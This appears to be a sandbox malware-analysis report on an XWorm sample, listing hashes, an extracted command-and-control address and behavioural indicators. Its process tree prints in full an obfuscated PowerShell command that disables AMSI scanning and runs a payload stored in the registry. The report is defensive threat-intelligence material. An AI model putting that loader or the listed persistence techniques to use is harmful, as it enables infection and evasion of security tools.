Overview
overview
10Static
static
10fr2nnk.exe
windows10-1703-x64
10fr2nnk.exe
windows7-x64
10fr2nnk.exe
windows10-2004-x64
10fr2nnk.exe
windows11-21h2-x64
10grab.exe
windows10-1703-x64
10grab.exe
windows7-x64
7grab.exe
windows10-2004-x64
8grab.exe
windows11-21h2-x64
8m2zen.exe
windows10-1703-x64
7m2zen.exe
windows7-x64
7m2zen.exe
windows10-2004-x64
7m2zen.exe
windows11-21h2-x64
7winhlp32.exe
windows10-1703-x64
10winhlp32.exe
windows7-x64
10winhlp32.exe
windows10-2004-x64
10winhlp32.exe
windows11-21h2-x64
10Analysis
-
max time kernel
30s -
max time network
32s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
11-05-2024 09:52
Behavioral task
behavioral1
Sample
fr2nnk.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
fr2nnk.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
fr2nnk.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
fr2nnk.exe
Resource
win11-20240426-en
Behavioral task
behavioral5
Sample
grab.exe
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
grab.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
grab.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral8
Sample
grab.exe
Resource
win11-20240508-en
Behavioral task
behavioral9
Sample
m2zen.exe
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
m2zen.exe
Resource
win7-20231129-en
Behavioral task
behavioral11
Sample
m2zen.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral12
Sample
m2zen.exe
Resource
win11-20240508-en
Behavioral task
behavioral13
Sample
winhlp32.exe
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
winhlp32.exe
Resource
win7-20240419-en
Behavioral task
behavioral15
Sample
winhlp32.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
winhlp32.exe
Resource
win11-20240419-en
General
-
Target
winhlp32.exe
-
Size
205KB
-
MD5
a83dc22ef14c6b5d96aaee00b10a4973
-
SHA1
ef84a5e12797487e7a4c1acaa9f783eda6cc77d5
-
SHA256
143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d
-
SHA512
0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc
-
SSDEEP
6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd
Malware Config
Extracted
xworm
3.0
147.185.221.18:41012
-
Install_directory
%AppData%
-
install_file
Agent.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\System32\x4L.exe family_xworm behavioral16/memory/2796-18-0x0000000000190000-0x00000000001A8000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3608 created 636 3608 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 4844 powershell.exe 1760 powershell.exe 3440 powershell.exe -
Drops startup file 2 IoCs
Processes:
x4L.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk x4L.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk x4L.exe -
Executes dropped EXE 2 IoCs
Processes:
x4L.exex4Shellcode.exepid process 2796 x4L.exe 2292 x4Shellcode.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
x4L.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4L = "C:\\Users\\Admin\\AppData\\Roaming\\x4L.exe" x4L.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 9 IoCs
Processes:
winhlp32.exepowershell.EXEsvchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\x4L.exe winhlp32.exe File created C:\Windows\System32\x4Shellcode.exe winhlp32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\System32\x4L.exe winhlp32.exe File opened for modification C:\Windows\System32\x4Shellcode.exe winhlp32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\x4L svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3608 set thread context of 3692 3608 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1572 timeout.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepowershell.exepowershell.exepowershell.exepid process 3608 powershell.EXE 3608 powershell.EXE 3608 powershell.EXE 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 4844 powershell.exe 4844 powershell.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 1760 powershell.exe 1760 powershell.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3440 powershell.exe 3440 powershell.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe 3692 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
winhlp32.exex4L.exepowershell.EXEdllhost.exepowershell.exeExplorer.EXEpowershell.exepowershell.exesvchost.exedescription pid process Token: SeDebugPrivilege 4472 winhlp32.exe Token: SeDebugPrivilege 2796 x4L.exe Token: SeDebugPrivilege 3608 powershell.EXE Token: SeDebugPrivilege 3608 powershell.EXE Token: SeDebugPrivilege 3692 dllhost.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeDebugPrivilege 1760 powershell.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeDebugPrivilege 3440 powershell.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeAuditPrivilege 2576 svchost.exe Token: SeDebugPrivilege 2796 x4L.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
x4L.exepid process 2796 x4L.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
winhlp32.execmd.exepowershell.EXEdllhost.exedescription pid process target process PID 4472 wrote to memory of 2796 4472 winhlp32.exe x4L.exe PID 4472 wrote to memory of 2796 4472 winhlp32.exe x4L.exe PID 4472 wrote to memory of 2292 4472 winhlp32.exe x4Shellcode.exe PID 4472 wrote to memory of 2292 4472 winhlp32.exe x4Shellcode.exe PID 4472 wrote to memory of 2292 4472 winhlp32.exe x4Shellcode.exe PID 4472 wrote to memory of 1360 4472 winhlp32.exe cmd.exe PID 4472 wrote to memory of 1360 4472 winhlp32.exe cmd.exe PID 1360 wrote to memory of 1572 1360 cmd.exe timeout.exe PID 1360 wrote to memory of 1572 1360 cmd.exe timeout.exe PID 3608 wrote to memory of 3692 3608 powershell.EXE dllhost.exe PID 3608 wrote to memory of 3692 3608 powershell.EXE dllhost.exe PID 3608 wrote to memory of 3692 3608 powershell.EXE dllhost.exe PID 3608 wrote to memory of 3692 3608 powershell.EXE dllhost.exe PID 3608 wrote to memory of 3692 3608 powershell.EXE dllhost.exe PID 3608 wrote to memory of 3692 3608 powershell.EXE dllhost.exe PID 3608 wrote to memory of 3692 3608 powershell.EXE dllhost.exe PID 3608 wrote to memory of 3692 3608 powershell.EXE dllhost.exe PID 3692 wrote to memory of 636 3692 dllhost.exe winlogon.exe PID 3692 wrote to memory of 688 3692 dllhost.exe lsass.exe PID 3692 wrote to memory of 1000 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 432 3692 dllhost.exe dwm.exe PID 3692 wrote to memory of 536 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 612 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1040 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1048 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1140 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1204 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1248 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1284 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1324 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1380 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1420 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1496 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1516 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1660 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1708 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1796 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1804 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1920 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1972 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1984 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1096 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1900 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2120 3692 dllhost.exe spoolsv.exe PID 3692 wrote to memory of 2216 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2364 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2372 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2448 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2500 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2576 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2588 3692 dllhost.exe sysmon.exe PID 3692 wrote to memory of 2600 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2632 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2648 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 2572 3692 dllhost.exe sihost.exe PID 3692 wrote to memory of 1368 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 1344 3692 dllhost.exe unsecapp.exe PID 3692 wrote to memory of 3300 3692 dllhost.exe Explorer.EXE PID 3692 wrote to memory of 3432 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 3452 3692 dllhost.exe svchost.exe PID 3692 wrote to memory of 3852 3692 dllhost.exe RuntimeBroker.exe PID 3692 wrote to memory of 3928 3692 dllhost.exe RuntimeBroker.exe PID 3692 wrote to memory of 3996 3692 dllhost.exe DllHost.exe PID 3692 wrote to memory of 4020 3692 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{39fab51a-a884-4cdb-bc30-892abd37798d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WLsBvUDUFzUX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QsRqydmxWCUJoj,[Parameter(Position=1)][Type]$NtNngWipAn)$hBwduIYyPze=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+'ct'+[Char](101)+''+[Char](100)+'De'+'l'+''+'e'+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+'y'+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+'Del'+'e'+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+'n'+'s'+[Char](105)+''+[Char](67)+'las'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hBwduIYyPze.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+'e'+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+'N'+[Char](97)+'m'+'e'+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+'ig'+[Char](44)+'P'+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QsRqydmxWCUJoj).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+[Char](103)+'e'+[Char](100)+'');$hBwduIYyPze.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+','+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$NtNngWipAn,$QsRqydmxWCUJoj).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+'d');Write-Output $hBwduIYyPze.CreateType();}$gkhQCDHnQythz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+'oso'+'f'+'t'+'.'+'W'+[Char](105)+''+'n'+''+'3'+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+'et'+'h'+'o'+[Char](100)+''+'s'+'');$FDLEghUILdNHfv=$gkhQCDHnQythz.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+','+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ulqsxvMpsmcZFKDAPms=WLsBvUDUFzUX @([String])([IntPtr]);$vbQCnNHZbfvHbIBVqvQlLX=WLsBvUDUFzUX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$oDxPXcgUfEL=$gkhQCDHnQythz.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'Ha'+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$rQXcaRYowWtyTF=$FDLEghUILdNHfv.Invoke($Null,@([Object]$oDxPXcgUfEL,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+'y'+'A')));$mMfnvirmTdHCrNaGt=$FDLEghUILdNHfv.Invoke($Null,@([Object]$oDxPXcgUfEL,[Object](''+'V'+'i'+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+'P'+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$oErFefZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rQXcaRYowWtyTF,$ulqsxvMpsmcZFKDAPms).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'ll');$cDtQTNtUTKFUYswkD=$FDLEghUILdNHfv.Invoke($Null,@([Object]$oErFefZ,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+'e'+''+[Char](114)+'')));$NHDnrNhohP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mMfnvirmTdHCrNaGt,$vbQCnNHZbfvHbIBVqvQlLX).Invoke($cDtQTNtUTKFUYswkD,[uint32]8,4,[ref]$NHDnrNhohP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cDtQTNtUTKFUYswkD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mMfnvirmTdHCrNaGt,$vbQCnNHZbfvHbIBVqvQlLX).Invoke($cDtQTNtUTKFUYswkD,[uint32]8,0x20,[ref]$NHDnrNhohP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](120)+''+[Char](52)+'sta'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
